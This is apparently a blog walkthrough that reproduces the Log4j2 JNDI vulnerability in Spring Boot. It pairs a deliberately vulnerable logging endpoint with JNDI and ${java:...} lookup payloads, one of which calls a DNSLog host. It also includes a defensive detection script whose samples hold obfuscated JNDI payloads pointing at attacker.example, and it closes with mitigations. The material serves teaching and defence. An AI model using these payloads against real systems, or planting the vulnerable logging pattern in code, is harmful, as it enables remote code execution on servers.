Reproducing the log4j2 vulnerability in Spring Boot
Project setup and environment
pom.xml
<parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.6.1</version>
</parent>
<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
        <exclusions>
            <exclusion>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-logging</artifactId>
            </exclusion>
        </exclusions>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-log4j2</artifactId>
        <version>2.1.1.RELEASE</version>
    </dependency>
</dependencies>
Java environment: jdk1.8
java version "11.0.13" 2021-10-19 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.13+10-LTS-370)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.13+10-LTS-370, mixed mode)
Writing the web endpoint
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class TestController {

    private static final Logger logger = LogManager.getLogger(TestController.class);

    /**
     * ${java:vm} prints: Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)
     * <p>
     * http://www.dnslog.cn/
     * ${jndi:ldap://7yqrz4.dnslog.cn}
     *
     * @param str the request body, logged as-is
     * @return the body echoed back
     */
    @PostMapping("/test")
    public String test(@RequestBody String str) {
        // The logged parameter is subject to lookup expansion in the affected Log4j versions.
        logger.info("str={}", str);
        return "return=" + str;
    }
}
Testing the vulnerability
Why does ${java:vm} get printed? Debug into it; the path is org.apache.logging.log4j.core.lookup.JavaLookup#lookup.
There are quite a few keys there; try them one by one:
${java:vm}       Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)
${java:locale}   default locale: zh_CN, platform encoding: UTF-8
${java:hw}       processors: 4, architecture: x86_64-64
${java:os}       Mac OS X 10.14.6 unknown, architecture: x86_64-64
${java:version}  Java version 1.8.0_162
${java:runtime}  Java(TM) SE Runtime Environment (build 1.8.0_162-b12) from Oracle Corporation
DNSLog: www.dnslog.cn/
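A detection pass a defender can run over request bodies captured by a WAF or access log in front of the /test endpoint, added here as an example and not part of the original post; the sample bodies and the attacker.example host are constructed. Before matching, it collapses the nested lookups Log4j itself resolves from the string alone (the ${key:-default} syntax and the lower/upper lookups), so a ${jndi: wrapped inside them is still caught, and it also flags plain ${java:...} probes like the ones tried above.

```python
import re
# Innermost ${...}: no nested $, { or } between the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation a JNDI lookup is the high-severity signal.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any other ${prefix:...} in user input is a lookup probe, like ${java:vm} above.
_ANY_LOOKUP = re.compile(r"\$\{\s*[a-z0-9_]+\s*:", re.IGNORECASE)

def _resolve_inner(expr: str) -> str:
    """Resolve only what Log4j resolves from the string alone: the ':-default'
    syntax (so ${::-j} -> 'j') and lower/upper; anything else stays literal."""
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    prefix, sep, value = expr.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return "${" + expr + "}"

def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text

def classify(body: str) -> str:
    """'jndi' for a JNDI lookup, 'lookup' for any other lookup, else 'clean'."""
    norm = normalize(body)
    if _JNDI.search(norm):
        return "jndi"
    if _ANY_LOOKUP.search(norm):
        return "lookup"
    return "clean"

# Constructed request bodies (not real traffic) as a WAF or access log in front
# of the /test endpoint might record them; attacker.example is a placeholder.
SAMPLES = [
    "hello world",
    "${java:vm}",
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}ndi:rmi://attacker.example/b}",
    "${${::-j}${::-n}di:ldap://attacker.example/c}",
]

def scan(bodies):
    return [(body, classify(body)) for body in bodies]
```

Feed the captured body strings to scan(); any "jndi" verdict recorded before the upgrade to 2.16.0 warrants checking that host for outbound LDAP or RMI connections.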
Mitigations (affected versions: Apache Log4j 2.x <= 2.14.1)
JVM parameter: -Dlog4j2.formatMsgNoLookups=true
Configuration change: log4j2.formatMsgNoLookups=True
System environment variable: set FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
Upgrade to >= 2.16.0: mvnrepository.com/artifact/or…
If you depend on spring-boot-starter-log4j2:
pom.xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.1.1.RELEASE</version>
    <!-- exclude first -->
    <exclusions>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<!-- then add manually -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.16.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.16.0</version>
</dependency>
Author: javanull
Link: https://juejin.cn/post/7041843601118068773